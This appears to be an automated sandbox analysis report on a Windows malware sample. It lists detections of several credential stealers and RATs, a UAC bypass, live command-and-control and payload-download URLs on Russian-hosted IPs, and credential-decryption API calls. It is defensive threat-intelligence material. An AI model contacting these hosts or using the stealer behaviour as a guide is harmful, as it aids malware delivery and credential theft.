Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21732000000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.0000021713EAB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2874374264.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2614325718.0000000005B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2871918307.0000000001202000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5564, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.3500e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.u2ts.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.u2ts.0.exe.3530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2528909810.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2ts.0.exe PID: 5256, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6BD40B40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC68EA0 sqlite3_clear_bindings,	2_2_6BC68EA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40D60 sqlite3_bind_parameter_name,	2_2_6BD40D60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD40C40 sqlite3_bind_zeroblob,	2_2_6BD40C40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC663C0 PR_Bind,	2_2_6BC663C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF22D0 sqlite3_bind_blob,	2_2_6BBF22D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC660B0 listen,WSAGetLastError,	2_2_6BC660B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC6C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	2_2_6BC6C050
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC66070 PR_Listen,	2_2_6BC66070
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC6C030 sqlite3_bind_parameter_count,	2_2_6BC6C030
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC66410 bind,WSAGetLastError,	2_2_6BC66410

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.150	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false
172.217.5.4	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
142.250.191.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
iolo0.b-cdn.net	185.93.1.243	true
www.google.com	142.250.191.132	true
note.padd.cn.com	176.97.76.106	true
svc.iolo.com	20.157.87.45	true
fp2e7a.wpc.phicdn.net	192.229.211.108	true
download.iolo.net	unknown	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGPm2u7EGIjCw4PtzX5gzzDlwzXIWtDXrCiRfdbHDSucDXyTngU0wLJluDFuO6KRqHMbqhlFxbvMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false		high
http://185.172.128.228/BroomSetup.exe	false	URL Reputation: safe URL Reputation: safe	unknown
http://185.172.128.150/c698e1bc8a2f5e6d.php	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false		high
http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	true	URL Reputation: malware	unknown
http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F	true	Avira URL Cloud: safe	unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.228/ping.php?substr=two	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.59/syncUpd.exe	URL Reputation: Label: malware
Source: http://185.172.128.228/ping.php?substr=two	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jipsoiol	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\dvffdl	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}
Source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.172.128.150/c698e1bc8a2f5e6d.php	Virustotal: Detection: 14%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.228/ping.php?substr=two	Virustotal: Detection: 18%	Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpu	Virustotal: Detection: 7%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll	Virustotal: Detection: 7%	Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpy	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpv	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dvffdl	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\jipsoiol	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: sx8RE6LbG0.exe

Virustotal: Detection: 39%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jipsoiol	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dvffdl	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: sx8RE6LbG0.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: CtIvEWInDoW
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: AgEBOxw
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: /#%33@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: @@@@<@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/\|
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: %s\%V/yVs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: %s\*.
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: }567y9n/S
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ntTekeny
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ging
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: PassMord0
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: J@@@`z`@J@@@J@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: OPQRSTUVWXY
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: 456753+/---- '
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: '--- '
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: n\|
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: HeapFree
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ntProcessId
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: wininet.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: shell32.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: .dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: column_text
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: login:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	2_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	2_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	2_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB43B0 PK11_PubEncryptPKCS1,PR_SetError,	2_2_6BCB43B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	2_2_6BCE0180
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6BCDA730
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6BCBA650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC98670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6BC98670
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6BD025B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB44C0 PK11_PubEncrypt,	2_2_6BCB44C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB4440 PK11_PrivDecrypt,	2_2_6BCB4440
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6BC84420
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDDA40 SEC_PKCS7ContentIsEncrypted,	2_2_6BCDDA40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	2_2_6BCB9840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	2_2_6BCB3850
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB3FF0 PK11_PrivDecryptPKCS1,	2_2_6BCB3FF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	2_2_6BCD9EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	2_2_6BC97D60
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00254280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_00254280
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_002545A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	3_2_002545A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 1408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 1396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Unpacked PE file: 0.2.sx8RE6LbG0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack

Uses 32bit PE files

Source: sx8RE6LbG0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 185.93.1.243:443 -> 192.168.2.5:49726 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296210614.0000021731FC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
